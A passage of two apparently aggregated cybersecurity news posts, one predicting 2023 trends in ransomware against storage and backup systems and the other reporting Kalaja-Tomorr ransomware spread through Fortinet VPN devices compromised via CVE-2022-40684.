Awareness about the perils of backup, storage, and data recovery is rising – but nowhere near quickly enough to catch up with the cyber-attack innovation. Only a couple of years ago, the prevailing view was that storage and backup systems were largely immune to attack as they were backend systems. That fallacy is dawning on more and more IT and security personnel. As more backups are infected with ransomware and more storage and backup vulnerabilities are used to infiltrate other enterprise systems, the word is getting out – slowly.

But for every enterprise that takes action to shore up the many storage and backup vulnerabilities and misconfigurations that exist, there is another that is wide open to attack. In 2023, therefore, we will see well-known storage CVEs being exploited for criminal gain as organizations fail to implement available patches. Similarly, we will see cybergangs continuing to exploit gaping holes in organizational security that can be traced back to well-publicized storage and backup misconfigurations.

To lessen the damage, organizations are advised to focus on the protection of their data. Add new layers of protection across their backup and storage infrastructure to thwart efforts that bypass networking and endpoint security. Make it extremely difficult to tamper with backups and exfiltrate data.

  3. Insurance Refusals and Rate Hikes

Many organizations remain unaware of the threat posed to their data by insecure storage and backup systems. But not insurance companies. Those offering cyber-insurance are putting pressure on organizations to up their data protection game. They are demanding more thorough assessments of IT, storage, and backup infrastructure before they offer a policy. Those performing poorly in these assessments face much higher rates or even complete refusal to insure. On the other hand, those organizations that demonstrate excellence in storage and backup security could save money.

  4. The Rise of Automated Storage and Backup Validation

Organizations typically house a LOT of data. Whether it is on-premises or in the cloud, there are numerous repositories of storage and backup data spread all over the place. Most organizations do a poor job of assessing where all their data resides, and an even poorer job of understanding where potential weaknesses may lie.

Automation is needed to inventory the enterprise to find any and all storage and backup resources. Once inventoried, that data needs to be scanned to isolate unpatched vulnerabilities, security misconfigurations, and other weak points. Unfortunately, traditional vulnerability scanners and patch management systems focus on application, network and OS insecurity. They do well at scanning these systems, but are found badly wanting when it comes to scanning storage and backup systems for vulnerabilities.

With growing pressure to improve security and increase compliance efforts, 2023 will see organizations start to invest in automated storage and backup security validation, reporting, and compliance evidence generation. That, in turn, will lead to security professionals becoming more educated in data storage in general. Currently, they are insufficiently versed in data storage and backup technologies and their associated security requirements. We will begin to see that shifting in 2023.

The post 2023 Predictions for Storage and Backup Ransomware appeared first on Cybersecurity Insiders.

A Canadian college and a global investment firm had their computer networks compromised with ransomware after hackers broke into the virtual private network of their Fortinet devices. The incident was discovered by security researchers from eSentire in October 2022, but for reasons not stated they only made the information public in January 2023.

eSentire's Threat Response Unit (TRU) stated that the attack on the Fortinet devices was carried out through an authentication bypass vulnerability, CVE-2022-40684.

Though Fortinet, which sells security products such as firewalls and antivirus software, has fixed the flaw, it appears to be too late, as hackers are buying and selling details of compromised devices on hacking forums.

eSentire TRU named the newly found ransomware Kalaja-Tomorr, or Kalajatomorr, which emerged in March 2022 and targets only English-speaking companies. Albania appears to be its birthplace, and it was developed with AES+RSA encryption that is hard to break and decrypt.

As of now, the group is charging a hefty fee for a decryption key, and the malware is also known to turn itself into a data wiper.

Microsoft’s threat intelligence unit is already behind the group and is said to soon offer a decryption key for Kalajatomorr.

NOTE- According to a detailed FBI report, around 316 ransomware variants have come into operation each year since 2018. However, only 9-10 of them come to public attention through their deeds; the rest either fade away or survive on mere $15 to $2k ransom payments made in volatile cryptocurrencies such as BTC.

 

The post Ransomware being spread through Fortinet VPN Devices appeared first on Cybersecurity Insiders.